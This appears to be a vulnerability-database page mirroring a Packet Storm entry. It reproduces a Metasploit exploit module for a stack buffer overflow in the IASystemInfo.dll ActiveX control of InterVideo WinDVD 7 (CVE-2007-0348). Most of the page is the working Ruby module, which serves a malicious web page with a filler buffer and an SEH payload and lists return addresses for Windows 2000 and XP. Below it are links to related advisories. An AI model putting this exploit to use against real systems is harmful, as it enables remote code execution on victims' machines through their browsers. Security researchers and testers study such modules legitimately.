Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMCPACKETSTORM:82978
HistoryNov 26, 2009 - 12:00 a.m.

WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow

2009-11-2600:00:00
MC
packetstormsecurity.com
15

0.845 High

EPSS

Percentile

98.2%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in IASystemInfo.dll ActiveX  
control in InterVideo WinDVD 7. By sending a overly long string  
to the "ApplicationType()" property, an attacker may be able to   
execute arbitrary code.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'MC' ],   
'Version' => '$Revision$',  
'References' =>   
[  
[ 'CVE', '2007-0348' ],  
[ 'OSVDB', '34315' ],  
[ 'BID', '23071' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 800,  
'BadChars' => "\x00\x09\x0a\x0d'\\",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ],   
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],   
  
],  
'DisclosureDate' => 'Mar 20 2007',  
'DefaultTarget' => 0))  
end  
  
def on_request_uri(cli, request)  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
# Randomize some things  
vname = rand_text_alpha(rand(100) + 1)  
strname = rand_text_alpha(rand(100) + 1)  
  
# Build the exploit buffer  
filler = rand_text_alpha(548)   
seh = generate_seh_payload(target.ret)   
sploit = filler + seh  
  
# Build out the message  
content = %Q|  
<html>  
<object classid='clsid:B727C217-2022-11D4-B2C6-0050DA1BD906' id='#{vname}'></object>  
<script language='javascript'>  
#{strname}= new String('#{sploit}')  
#{vname}.ApplicationType = #{strname}  
</script>  
</html>  
|  
  
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the response to the client  
send_response_html(cli, content)  
  
# Handle the payload  
handler(cli)  
end  
  
end  
`

Related

cve 1
securityvulns 2
checkpoint_advisories 1
prion 1
cert 1
kaspersky 1
cve
cve
CVE-2007-0348
2007-03-21 19:19:00
securityvulns
securityvulns
InterActual Player / CinePlayer ActiveX buffer overflow
2007-03-22 00:00:00
Secunia Research: InterActual Player / CinePlayer IASystemInfo.dll ActiveX Control Buffer Overflow
2007-03-22 00:00:00
checkpoint_advisories
checkpoint_advisories
Multiple Products IASystemInfo.DLL ActiveX Control Buffer Overflow (CVE-2007-0348)
2011-11-15 00:00:00
prion
prion
Stack overflow
2007-03-21 19:19:00
cert
cert
InterActual Player SyscheckObject ActiveX controls contain stack buffer overflows
2007-03-21 00:00:00
kaspersky
kaspersky
KLA10222 ACE vulnerabilities in player
2007-07-17 00:00:00

0.845 High

EPSS

Percentile

98.2%

JSON
Related for PACKETSTORM:82978
cve1securityvulns2checkpoint_advisories1prion1cert1kaspersky1